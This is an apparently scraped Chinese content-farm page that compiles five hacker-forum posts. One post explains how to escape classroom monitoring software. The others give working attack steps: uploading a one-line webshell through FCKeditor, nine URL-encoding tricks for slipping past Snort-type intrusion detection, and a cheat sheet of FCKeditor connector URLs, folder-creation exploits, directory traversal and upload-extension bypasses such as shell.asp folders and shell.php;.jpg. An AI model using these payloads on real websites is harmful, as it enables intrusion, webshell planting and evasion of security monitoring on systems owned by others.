关于凌波多媒体教学网如何突破漏洞预警

| 收藏本文 下载本文 作者:长岛冰茬儿

下面是小编给大家带来的关于凌波多媒体教学网如何突破漏洞预警(共含5篇),以供大家参考,我们一起来看看吧!同时,但愿您也能像本文投稿人“长岛冰茬儿”一样,积极向本站投稿分享好文章。

关于凌波多媒体教学网如何突破漏洞预警

篇1:关于凌波多媒体教学网如何突破漏洞预警

关于凌波多媒体教学网如何突破~

对于我们学生来说,上电脑课最想的是摆脱机子上老师装的监控软件~

然后做自己的事~

而我们学校的机子上装的是凌波多媒体教学网这个软件~

下面我来教大家如何简单快捷的摆脱控制~

好,进入正题....

1、开机后,快速打开桌面上的WORD,马上在键盘上按几个东西上去...(一定要快!!)

然后机子被控制了...

2、我们再按alt+ctrl+del,按注销~

呵呵~自动脱离控制了~

这个方法是不是很简单呢?呵呵~我是在上课时打这篇文章的~~~

注:我是好学生...

篇2:新突破fckeditor漏洞漏洞预警

经测试,此方法通杀asp、aspx版本,不适用于php,

之前很多的方法,诸如上传*.asp等类型文件;创建*.asp等目录……

今天遇到一个fck编辑器,跟之前很多次一样,以上方法均无果。

创建*.asp;*.php等目录无果;上传*.asp;.jpg等文件无果;神马cer之类的就不说了,

以下是误打误撞的方法,不知道黑扩们发了没。

利用过程:

1、Current Folder处填写*.asp等目录文件,随便填即可;点击Create Folder创建目录;目录名随便填。

2、上传jpg格式的一句话木马。

3、利用完毕,直接访问一句话木马地址即可,菜刀链接。

篇3:九招突破IDS漏洞预警

入侵检测系统,英文简写为IDS,顾名思义,它是用来实时检测攻击行为以及报告攻击的,如果把防火墙比作守卫网络大门的门卫的话,那么入侵检测系统(IDS)就是可以主动寻找罪犯的巡警。 因而寻求突破IDS的技术对漏洞扫描、脚本注入、URL攻击等有着非凡的意义,同时也是为了使IDS进一步趋向完善。

Snort是很多人都在用的一个IDS了,其实它也并不是万能的,笔者下面就来谈谈突破诸如Snort这类基于网络的IDS的方法:多态URL技术。

提起多态二字,大家可能会联想到编写病毒技术中的“多态”、“变形”等加密技术,其实我这里所要讲的URL多态编码技术和病毒的多态变形技术也有神似之处,就是用不同的表现形式来实现相同的目的。

对于同一个URL,我们可以用不同形式的编码来表示。IDS在实时检测时,将它检测到的数据与其本身规则集文件中规定为具有攻击意图的字符串进行对比,如果相匹配的话,则说明系统正在受攻击,从而阻止攻击以及发出警报。因为实现同一目的的URL可以用不同的形式来表示,所以经过变形编码后的URL可能就不在IDS的规则集文件中,也就扰乱了IDS的识别标志分析引擎,从而就实现了突破、绕过IDS的效果!

多态URL编码技术有许多种,笔者在此介绍9种常用且有一定代表性的方法。为了便于讲解,这里以提交地址为/msadc/ msadcs.dll的URL来作为例。“/msadc/msadcs.dll”已经被收集到snort等各大IDS的规则集文件中,因而当我们向目标机器直接提交/msadc/ msadcs.dll时都会被IDS截获并报警。

第一招:“/./” 字符串插入法

鉴于“./”的特殊作用,我们可以把它插入进URL中来实现URL的变形。比如对于/msadc/msadcs.dll,我们可以将它改写为/././msadc/././msadcs.dll、/./msadc/.//./msadcs.dll等形式来扰乱了IDS的识别标志分析引擎,实现了欺骗IDS的目的。而且改写后编码后的URL与未修改时在访问效果上是等效的。笔者曾经通过实验表明这种方法可以绕过Snort等IDS。

第二招:“00 ” ASCII码

前段时间动网上传漏洞就是利用的这一特性,大家肯定对此很熟悉了。它的原理就是计算机处理字符串时在ASCII码为00处自动截断。我们就可以把/msadc/msadcs.dll改写为/msadc/msadcs.dll Iloveheikefangxian,用Winhex将.dll与Ilove之间的空格换为00的ASCII码,保存后再用NC配合管道符提交。这样在有些IDS看来/msadc/msadcs.dll Iloveheikefangxian并不与它的规则集文件中规定为具有攻击意图的字符串相同,从而它就会对攻击者的行为无动于衷。瞧!“计算机处理字符串时在ASCII码为00处自动截断”这一原理的应用多么广泛啊!从哲学上讲,事物之间相互存在着联系,我们应该多思考,挖掘出内在规律,这样就会有新的发现。

第三招:使用路径分隔符“”

对于像微软的IIS这类Web服务器,““也可以当“/”一样作为路径分隔符。有些IDS在设置规则集文件时并没有考虑到非标准路径分隔符“”。如果我们把/msadc/msadcs.dll改写为msadc msadcs.dll就可以逃过snort的法眼了,因为snort的规则集文件里没有msadc msadcs.dll这一识别标志,

值得一提的是路径分隔符“”还有个妙用,就是前段时间《 防线》上提到的“%5c”暴库大法,“%5c”就是“”的16进制表现形式。

第四招:十六进制编码

对于一个字符,我们可以用转义符号“%” 加上其十六进制的ASCII码来表示。比如/msadc/msadcs.dll中第一个字符“/”可以表示为%2F,接下来的字符可以用它们对应的16 进制的ASCII码结合“%”来表示,经过此法编码后的URL就不再是原先的模样了,IDS的规则集文件里可能没有编码后的字符串,从而就可以绕过IDS。但是这种方法对采用了HTTP预处理技术的IDS是无效的。

第五招.非法Unicode编码

UTF-8编码允许字符集包含多余256个字符,因此也就允许编码位数多于8位。“/”字符的十六进制的ASCII码是2F,用 动画吧数表示就是00101111。UTF-8格式中表示2F的标准方法仍然是2F,但是也可以使用多字节UTF-8来表示2F。字符“/”可以像下表中所示使用单字节、双字节、三字节的UTF-8编码来表示:

“/”字符表示方式 动画吧 十六进制

单字节 0xxxxxxx 00101111 2F

双字节 110xxxxx 10xxxxxx 11000000 10101111 C0 AF

三字节 1110xxxx 10xxxxxx 10xxxxxx 11100000 10000000 10101111 E0 80 AF

按照此方法,我们可以对整个字符串都进行相应的编码。虽然编码后的URL的最终指向的资源都相同,但它们的表达方式不同, IDS的规则集文件中就可能不存在此过滤字符串,从而就实现了突破IDS的目的。

第六招: 多余编码法

多余编码又称双解码。还记的-IIS的Unicode解码漏洞和双解码漏洞闹得沸沸扬扬,那时有许多朋友稀里糊涂的以为Unicode解码漏洞就是双解码漏洞,其实它们两者是两回事,前者的原理笔者已在上述的“非法Unicode编码”中有所描述。而多余编码就是指对字符进行多次编码。比如“/”字符可以用%2f表示,“%2f”中的“%”、“2”、“f”字符又都可以分别用它的ASCII码的十六进制来表示,根据数学上的排列组合的知识可知,其编码的形式有2的3次方,于是“%2f”可以改写为:“%25%32%66”、“%252f”等等来实现URL的多态,编码后的字符串可能没被收集在IDS的规则集文件中,从而可以骗过有些IDS。

第七招.加入虚假路径

在URL中加入“../”字符串后,在该字符串后的目录就没有了意义,作废了。因此利用“../”字符串可以达到扰乱了识别标志分析引擎、突破IDS的效果!

第八招:插入多斜线

我们可以使用多个 “/”来代替单个的“/”。替代后的URL仍然能像原先一样工作。比如对/msadc/msadcs.dll的请求可以改为////msadc////msadcs.dll,经笔者曾经实验,这种方法可以绕过某些IDS。

第九招:综合多态编码

聪明的你一看这个小标题就知道了,所谓综合,就是把以上介绍的几种多态变形编码技术结合起来使用,这样的话效果会更好。

后记:当我刚才提到“00 ASCII码”以及非标准路径分隔符“”时,大家可能会倍感熟悉,因为这与前段时间流行的动网上传漏洞以及暴库大法有着密切联系。 是门艺术, 讲究的是灵感是思路,我们通过深入思考,旧的知识也可以创造出新的技术!

篇4:FCK各版本突破漏洞预警

不知道谁的版权-

FCKeditor v2.43版本FCKeditor/editor/filemanager/browser/default/connectors/php/config.php

FCKeditor V2.6.6版本 fckeditor/editor/filemanager/connectors/asp/config.php

查看编辑器版本

FCKeditor/_whatsnew.html

—————————————————————————————————————————————————————————————

2. Version 2.2 版本

Apache+linux 环境下在上传文件后面加个.突破!测试通过,

—————————————————————————————————————————————————————————————

3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。

action=”www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media” method=”post”>Upload a new file:

—————————————————————————————————————————————————————————————

高版本存在 低版本不存在

4.FCKeditor 文件上传“.”变“_”下划线的绕过方法

很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。

4.1:提交shell.php+空格绕过

不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。

4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。

—————————————————————————————————————————————————————————————

5. 突破建立文件夹

FCKeditor V2.6.6

FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

FCKeditor v2.4.3

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp

—————————————————————————————————————————————————————————————

/wwwroot/userfiles/image/333.asp/2.asp;3.jpg

6. FCKeditor 中test 文件的上传地址

最新的 利用iis解析漏洞asp文件夹上存图片 或者是2.asp;jpg

FCKeditor v2.4.3

FCKeditor/editor/filemanager/browser/default/connectors/test.html

FCKeditor/editor/filemanager/upload/test.html

userfiles/file/1.asp;2(1).jpg

FCKeditor V2.6.6

FCKeditor/editor/filemanager/connectors/test.html

FCKeditor/editor/filemanager/connectors/uploadtest.html

—————————————————————————————————————————————————————————————

7.常用上传地址

FCKeditor v2.4.3

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor V2.6.6不能上传 不能建立

FCKeditor v2.4.3能上传 能建立

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)

JSP 版:

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp

注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文

件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址,

—————————————————————————————————————————————————————————————

8.其他上传地址

全部存在

FCKeditor/_samples/default.html

FCKeditor/_samples/asp/sample01.asp

FCKeditor/_samples/asp/sample02.asp

FCKeditor/_samples/asp/sample03.asp

FCKeditor/_samples/asp/sample04.asp

一般很多站点都已删除_samples 目录,可以试试。

FCKeditor V2.6.6(空白)

FCKeditor v2.4.3 存在

FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。

—————————————————————————————————————————————————————————————

9.列目录漏洞也可助找上传地址

Version 2.4.1 测试通过

修改CurrentFolder 参数使用 ../../来进入不同的目录

/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp

根据返回的XML 信息可以查看网站所有的目录。

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F

也可以直接浏览盘符:

JSP 版本:

FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F

—————————————————————————————————————————————————————————————

10.爆路径漏洞

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp

—————————————————————————————————————————————————————————————

11. FCKeditor 被动限制策略所导致的过滤不严问题

影响版本: FCKeditor x.x <= FCKeditor v2.4.3

脆弱描述:

FCKeditor v2.4.3 中File 类别默认拒绝上传类型:

html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm

Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!

而在apache 下,因为”Apache 文件名解析缺陷漏洞”也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。

在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!

—————————————————————————————————————————————————————————————

12.最古老的漏洞,Type文件没有限制!

我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本!

—————————————————————————————————————————————————————————————

篇5:FCKeditor 建立文件夹、上传文件时“.”变“”的突破漏洞预警

一些小技巧,有时候还挺有用的,收集下,资料收集于互联网……

FCKeditor 文件上传“.”变“_”下划线的绕过方法:

这是网上公布的:

很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg

提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试,

继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制,

突破建立文件夹:

editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp

参数:

当前目录名:CurrentFolder=/qing.asp

新的目录名:NewFolderName=x.asp

其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……

那么 x.asp 就已经建立生成了,此方法百试百灵!

新建文件夹参数 x.asp,基本都能搞定。

FCKeditor漏洞利用总结漏洞预警

PHP 5.2.11/5.3.0 的多个漏洞漏洞预警

关于MS08067的一点细节漏洞预警

dedecms 5.7 edit.inc.php文件注射漏洞预警

中学语文教学网

shopxp pinglun.asp文件SQL注入漏洞分析漏洞预警

Thaiweb远程文件sql注入漏洞0day漏洞预警

火狐远程代码执行漏洞 Firefox 3.6.16漏洞预警

eWebeditoR3.8 for php任意文件上传EXP漏洞预警

dhtmlmenubuilder密码及XSS跨站漏洞漏洞预警

关于凌波多媒体教学网如何突破漏洞预警(精选5篇)

欢迎下载DOC格式的关于凌波多媒体教学网如何突破漏洞预警,但愿能给您带来参考作用!
推荐度: 推荐 推荐 推荐 推荐 推荐
点击下载文档 文档为doc格式

猜你喜欢

NEW
点击下载本文文档